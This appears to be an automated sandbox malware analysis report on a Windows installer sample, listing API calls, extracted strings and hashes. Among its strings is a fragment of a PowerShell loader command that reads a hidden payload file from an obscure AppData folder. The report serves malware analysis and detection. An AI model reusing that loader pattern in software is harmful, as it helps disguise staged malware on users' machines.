                                                                                                • DeleteObject.GDI32(00000000), ref: 00404A6C
                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DA6
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F45
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                                                                                • ShowWindow.USER32(00000000), ref: 00404F57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 1638840714-813528018
                                                                                                • Opcode ID: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                                                                • Instruction ID: 6d1688c8488b8f7448caaf142d0c57913a8900a758ff6f7bd5d79a6fae369404
                                                                                                • Opcode Fuzzy Hash: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                                                                • Instruction Fuzzy Hash: 05026DB0900209EFEB149F54DD45AAE7BB9FB84314F14813AE610BA2E1C7B99D51CF58
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 0040447F
                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004044A9
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040455A
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404565
                                                                                                • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 00404597
                                                                                                • lstrcatW.KERNEL32(?,: Completed), ref: 004045A3
                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5
                                                                                                  • Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                                  • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717
                                                                                                Strings
                                                                                                • : Completed, xrefs: 00404591, 00404596, 004045A1
                                                                                                • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00404580
                                                                                                • "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets, xrefs: 00404449
                                                                                                • A, xrefs: 00404553
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                • String ID: "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets$: Completed$A$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
                                                                                                • API String ID: 2246997448-1348262891
                                                                                                • Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                                                • Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
                                                                                                • Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                                                • Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic, xrefs: 004020F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInstance
                                                                                                • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic
                                                                                                • API String ID: 542301482-3586988424
                                                                                                • Opcode ID: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                                                                • Instruction ID: 088bd36a67d226d4641d4dbc6bd9d2ef39f197a4cbb9ab5218a9f08cb7fb8330
                                                                                                • Opcode Fuzzy Hash: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                                                                • Instruction Fuzzy Hash: 1C413075A00105AFCB00DFA4CD89EAE7BB6EF48314F20456AF906EB2D1DAB9DD41CB54
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFindFirst
                                                                                                • String ID:
                                                                                                • API String ID: 1974802433-0
                                                                                                • Opcode ID: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                                                                • Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
                                                                                                • Opcode Fuzzy Hash: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                                                                • Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                                • Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
                                                                                                • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                                • Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44
                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041E4
                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
                                                                                                • GetSysColor.USER32(?), ref: 00404212
                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
                                                                                                • lstrlenW.KERNEL32(?), ref: 00404233
                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                                                                • SendMessageW.USER32(00000000), ref: 004042B5
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042E0
                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404331
                                                                                                • SetCursor.USER32(00000000), ref: 00404334
                                                                                                • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404355
                                                                                                • SetCursor.USER32(00000000), ref: 00404358
                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                • String ID: @.C$N$open
                                                                                                • API String ID: 3615053054-801394694
                                                                                                • Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                                                • Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
                                                                                                • Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                                                • Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98
                                                                                                APIs
                                                                                                • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
                                                                                                • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F
                                                                                                  • Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                                                  • Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                                                • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
                                                                                                • wsprintfA.USER32 ref: 00405ACA
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405BCD
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405BD4
                                                                                                  • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                                  • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1738451017.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738504816.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738523211.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                • API String ID: 3756836283-899692902
                                                                                                • Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                                                • Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
                                                                                                • Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                                                • Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F
                                                                                                • API String ID: 941294808-1304234792
                                                                                                • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                                • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                                                                • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                                • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                                                                APIs
                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                                • CharNextW.USER32(?,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                                • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: "C:\Users\user\Desktop\LMSxhK1u8Z.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 589700163-871486053
                                                                                                • Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                                                • Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
                                                                                                • Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                                                                • Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 0040252D
                                                                                                • lstrlenA.KERNEL32(Heteric,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 00402534
                                                                                                • WriteFile.KERNEL32(00000000,?,Heteric,00000000,?,?,00000000,00000011), ref: 00402566
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                • String ID: 8$C:\Program Files (x86)\edelweissen\romanblade.ini$Heteric
                                                                                                • API String ID: 1453599865-1441359250
                                                                                                • Opcode ID: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                                                                • Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
                                                                                                • Opcode Fuzzy Hash: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                                                                • Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404019
                                                                                                • GetSysColor.USER32(00000000), ref: 00404035
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404041
                                                                                                • SetBkMode.GDI32(?,?), ref: 0040404D
                                                                                                • GetSysColor.USER32(?), ref: 00404060
                                                                                                • SetBkColor.GDI32(?,?), ref: 00404070
                                                                                                • DeleteObject.GDI32(?), ref: 0040408A
                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404094
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                                • Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
                                                                                                • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                                                                • Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3294113728-0
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
                                                                                                • GetMessagePos.USER32 ref: 004048E7
                                                                                                • ScreenToClient.USER32(?,?), ref: 00404901
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
                                                                                                • MulDiv.KERNEL32(000FF59F,00000064,001000B0), ref: 00402C5E
                                                                                                • wsprintfW.USER32 ref: 00402C6E
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402C7E
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 00402C68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401D44
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                • CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                • String ID: Calibri
                                                                                                • API String ID: 3808545654-1409258342
                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
                                                                                                • ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
                                                                                                  • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: FileRead$ByteCharMultiWidewsprintf
                                                                                                • String ID: 9
                                                                                                • API String ID: 3029736425-2366072709
                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                                                • lstrlenW.KERNEL32(C:\Program Files (x86)\edelweissen\romanblade.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
